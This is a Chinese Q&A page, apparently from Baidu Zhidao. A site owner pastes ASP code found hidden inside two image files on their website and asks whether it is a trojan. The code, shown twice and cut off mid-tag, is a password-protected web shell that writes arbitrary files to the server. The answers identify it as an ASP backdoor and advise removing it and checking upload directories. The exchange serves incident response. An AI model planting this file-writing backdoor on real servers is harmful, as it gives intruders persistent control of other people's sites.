UC知道请黑客高手看一下隐藏在网站一个图片的代码是不是木马
来源:百度知道 编辑:UC知道 时间:2024/07/08 02:20:25
我查出了 网站根目录的2个图片居然能调用FSO功能 图片正常情况打不开 我用记事本查看里面有如下代码
<%
on error resume next
%>
<%
if request("pass")="haait" then
session("pw")="go"
end if
%>
<%if session("pw")<>"go" then %>
<%="<center><br><form action='' method='post'>"%>
<%="<input name='pass' type='password' size='10'> <input "%>
<%="type='submit' value='管理登陆'></center>"%>
<%else%>
<%
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
%>
<%="上传成功"%>
<%else%>
<%="上传失败"%
<%
on error resume next
%>
<%
if request("pass")="haait" then
session("pw")="go"
end if
%>
<%if session("pw")<>"go" then %>
<%="<center><br><form action='' method='post'>"%>
<%="<input name='pass' type='password' size='10'> <input "%>
<%="type='submit' value='管理登陆'></center>"%>
<%else%>
<%
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
%>
<%="上传成功"%>
<%else%>
<%="上传失败"%
图片里面发现代码,立刻删无赦。
(而且这代码看起来就是个木马)
你都总结出来了 还问什么?
不是
是ASP小马,你的网站应该被人入侵上传大马呢.看看数据库备份目录和其它上传目录.是否有异样的文件.
是ASP木马